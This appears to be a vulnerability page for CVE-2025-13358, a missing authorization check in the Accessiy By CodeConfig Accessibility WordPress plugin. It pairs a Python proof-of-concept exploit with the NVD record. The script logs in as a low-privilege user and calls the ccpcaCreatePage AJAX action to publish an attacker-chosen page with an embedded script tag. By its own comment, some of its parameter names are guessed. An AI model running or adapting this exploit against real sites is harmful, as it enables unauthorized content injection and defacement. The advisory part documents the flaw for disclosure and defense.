CVE-2025-13358

import requests import sys # CVE-2025-13358 PoC - Unauthorized Page Creation via ccpcaCreatePage AJAX action # Affected: Accessiy By CodeConfig Accessibility plugin <= 1.0.0 target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com' # WordPress AJAX endpoint ajax_url = f'{target_url}/wp-admin/admin-ajax.php' # Authentication credentials (any valid user account with Subscriber role or higher) credentials = { 'log': 'attacker_username', 'pwd': 'attacker_password' } # Create session and authenticate session = requests.Session() login_url = f'{target_url}/wp-login.php' resp = session.post(login_url, data=credentials) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Authentication failed') exit(1) print('[+] Authentication successful') # Exploit payload - create arbitrary page # Action: ccpcaCreatePage # Required parameters: page_title, page_content (plugin specific parameter names may vary) exploit_data = { 'action': 'ccpcaCreatePage', 'page_title': 'Malicious Page Created by Attacker', 'page_content': '<h1>Compromised Page</h1><script>malicious_code_here</script>', 'page_status': 'publish' # Published immediately without authorization } response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print('[+] Exploit sent successfully') print(f'[+] Response: {response.text}') print('[!] Check WordPress pages for newly created malicious content') else: print(f'[-] Exploit failed with status code: {response.status_code}')

{"cve": {"id": "CVE-2025-13358", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:51.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Accessiy By CodeConfig Accessibility plugin for WordPress is vulnerable to unauthorized page creation due to missing authorization checks in versions up to, and including, 1.0.0. This is due to the plugin not performing capability checks in the `Settings::createPage()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary published pages on the site via the `ccpcaCreatePage` AJAX action."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax/Settings.php#L96", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L96", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3411529/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe324d4d-eb52-4eeb-ad91-072a6e84d9ba?source=cve", "source": "[email protected]"}]}}